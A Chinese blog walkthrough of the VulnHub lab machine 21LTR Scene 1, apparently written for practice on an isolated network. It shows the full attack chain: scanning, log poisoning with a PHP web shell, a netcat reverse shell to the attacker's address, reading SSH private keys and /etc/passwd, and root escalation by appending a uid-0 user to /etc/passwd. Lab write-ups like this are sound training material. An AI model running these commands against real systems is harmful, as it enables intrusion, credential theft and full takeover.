21 LTR Scene1复现

于 2024-09-14 17:35:02 发布
阅读量243 收藏 9
点赞数 4
分类专栏: vulnhub靶场练习 文章标签: 安全性测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_61982677/article/details/142263444
版权

环境搭建

21LTR: Scene 1 ~ VulnHub

导入靶机

修改网卡

修改靶机和 kali 攻击机网络模式为仅主机模式置于同一张网卡下

靶机:192.168.2.120

kali(攻击机):192.168.2.129

主机扫描

nmap -sP 192.168.2.0/24 -T4

端口扫描

nmap -sV -p- 192.168.2.120

开放了 4 个端口 ftp21 ssh22 http80 10001

访问 80 端口

就只有一个界面

目录扫描

dirsearch -u http://192.168.2.120/ -e* -i 200

毫无所获

漏洞探测

查看网页源代码

发现用户密码 username:logs password:zg]E-b0]+8:(58G

尝试 ssh 连接

ssh logs@192.168.2.120

失败,尝试 ftp 连接

ftp 192.168.2.120

连接成功,输入 ls 查看该目录下的文件

发现一个文件,下载到 kali,查看

get backup_log.php /home/kali/Desktop/1.php
cat 1.php

发现是个日志文件,拼接之前扫到的目录访问

http://192.168.2.120/logs/backup_log.php

获取 shell

在日志文件中写入 一句话木马,需要利用 10001 端口

telnet 192.168.2.120 10001
<?php system($_GET['cmd']);?>

重新访问

拼接 cmd=id 发现可以执行

拼接参数值,写入反弹shell语句

nc -e /bin/sh 192.168.2.129 6666

kali监听

nc -lvvp 9999

成功反弹 shell

提权

建立交互式shell

python -c 'import pty;pty.spawn("/bin/bash")'

读取密钥文件

cd /media/USB_1/Stuff/Keys
ls
cat authorized_keys
cat id_rssa

查看/etc.passwd

cat /etc/passwd

发现存在hbeale用户,尝试用秘钥文件登录

ssh -i id_rsa hbeale@192.168.2.120

成功连接

利用不安全配置/etc/passwd可写进行提权

利用openssl生成密码hash值

openssl passwd 123456

将hash密码拼接 添加到/etc/passwd

$1$41wwboBi$Hh.0DAJGnxQiw5nrlvaDy0
admin:$1$41wwboBi$Hh.0DAJGnxQiw5nrlvaDy0:0:0:root:/root:/bin/bash
echo 'admin:$1$41wwboBi$Hh.0DAJGnxQiw5nrlvaDy0:0:0:root:/root:/bin/bash' >> /etc/passwd

添加 root权限用户成功,切换 root权限用户

su admin

提权成功!

LYxianyu
关注
专栏目录
CTF之21LTR Scene1 靶机渗透(日志信息,Wireshark抓包)
afei001
08-02 729
  练习环境     攻击机:kali     靶机:21LTR: Scene1     下载地址:https://download.vulnhub.com/21ltrcom/21LTR.com_Scene1_2.120_v1.0.iso      1.发现靶机,端口扫描 root@kali:~# ifconfig eth0 eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500 inet 192.168.2.3 .
航空发动机H∞_LTR控制试验验证1
08-04
航空发动机H∞_LTR控制试验验证1 航空发动机控制系统是航空航天领域中的一个重要组成部分,随着航空发动机性能的不断提高,航空发动机控制系统不可避免地将由单变量控制发展到多变量控制。为了验证多变量鲁棒控制在...
21LTR: Scene 1靶机
m0_61995767的博客
07-30 598
21LTR: Scene 1打靶记录
vulnhub系列:21LTR:Scene1靶机
jq_j37的博客
07-29 387
21LTR:Scene1靶机,打靶文章
21LTR:Scene1超详细靶机实战
weixin_68615160的博客
07-30 437
考虑到是日志文件,我们可以尝试将一句话木马写到日志文件中获取shell。读取密钥 /media/USB_1/Stuff/Keys/id_rsa。尝试用该账号连接ssh服务和ftp服务,成功连接ftp服务。我们想起来刚刚目录探测有一个logs目录,我们尝试访问。将newroot用户写入到/etc/passwd。发现不需要密码的只有cat命令,我们就用它去提权。我们F12查看页面源码可以发现一个用户和密码。考虑到有ssh服务,我们可以使用密钥免密登录。写入一个高权限用户到/etc/passwd。
Hack the 21LTR: Scene 1 VM (Boot to Root)
marcushbs的博客
08-21 417
靶机下载链接: https://www.vulnhub.com/entry/21ltr-scene-1,3/ 主机扫描: ╰─ nmap -p1-65535 -sV -sC -A 192.168.2.120 Starting Nmap 7.70 ( https://nmap.org ) at 2019-08-28 11:19 CSTNmap scan report for 192.168.2.120Host is up (0.0012s latency).Not shown: 65532 ...
21LTR.com_Scene1_2.120_v1.0靶机(超级详细,看了就会)
zdd1453691081的博客
07-30 377
【代码】21LTR.com_Scene1_2.120_v1.0靶机(超级详细,看了就会)
Vulhub21LTR:Scene靶机详解
weixin_62457642的博客
09-13 477
靶机21LTR:Scene速刷
21LTR-Scene靶机渗透测试
weixin_58786230的博客
07-30 429
【代码】21LTR-Scene靶机渗透测试
Vulnhub靶机 21 LTR-Scene1(渗透测试详细)
2301_78721909的博客
07-30 394
Vulnhub靶机 21 LTR-Scene1详解(from wuhu)
21LTR-Scene打靶渗透【附POC】(权限提升)
weixin_52487093的博客
07-31 406
21LTR-Scene打靶渗透【附POC】(权限提升)
LTR.zip_ltr
09-24
标题 "LTR.zip_ltr" 暗示我们关注的焦点是一个与化学工程相关的计算程序,特别是关于液态回流(LTR)的算法。在石油炼制、化工生产等领域,蒸馏塔是重要的分离设备,而液态回流是蒸馏过程中优化效率的关键因素。这个...
LTR_559ALS.rar_LTR 年用量_LTR_559ALS_STM32驱动LTR-303_STM32驱动LTR_559A
07-15
标题中的“LTR_559ALS.rar_LTR 年用量_LTR_559ALS_STM32驱动LTR-303_STM32驱动LTR_559A”表明这是一个关于LTR-559ALS光感应器在STM32微控制器上的驱动程序和应用的资源包。关键词“年用量”可能指的是该传感器在特定...
LTR_gop1 (1).cfg
11-14
LTR_gop1 (1).cfg
航空发动机H_LTR控制试验验证_杨刚1
08-03
【航空发动机H∞/LTR控制试验验证】 本文主要探讨了多变量鲁棒控制技术在航空发动机控制中的应用,并通过半物理模拟试验进行了验证。作者杨刚等人详细介绍了H∞/LTR(H-infinity Loop Transfer Recovery)控制模块...
第三方软件测评机构简析:软件安全性测试的方法和流程
卓码测评
09-12 587
随着信息技术的迅猛发展,软件在各行各业的应用日益普遍,软件安全性问题也愈加凸显。近几年来,频发的数据泄露、网络攻击事件,给企业和个人带来了不可估量的损失。这使得软件安全性测试成为软件开发过程中不可或缺的重要环节。
基于大模型技术的算力产业监测服务平台设计
09-17
内容概要:本文提出了一种新型算力产业监测服务平台的设计理念,运用国内自主研发的大模型技术支持,通过对传统技术的改进和完善,提出了三层架构的设计方法,即基础设施层(含向量数据库和模型训练)、大模型应用框架层(强化数据处理与多维关系挖掘)及业务层(如智能分析助手)。这种设计方案旨在提高算力产业发展监测与决策制定的质量。 适合人群:电信行业的从业人员及研究人员;算力产业链各环节管理者;政府相关机构和政策决策者。 使用场景及目标:在多种算力相关的应用场景(如云计算中心管理,数据中心监测,政策分析)中辅助决策者进行快速有效的信息获取和技术选择;助力算力产业发展方向的精确把控和战略调整。 其他说明:随着大模型技术的日臻成熟,该算力产业监测服务平台预计将进一步丰富自身的应用领域和服务深度,以促进算力行业更智慧化发展。
This_honeypot_supports_Telnet_and_SSH_two_protocol_FF-Pot.zip
最新发布
09-17
This_honeypot_supports_Telnet_and_SSH_two_protocol_FF-Pot
吉他谱_What I've Done - Linkin Park.pdf
09-17
初级入门吉他谱 guitar tab
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值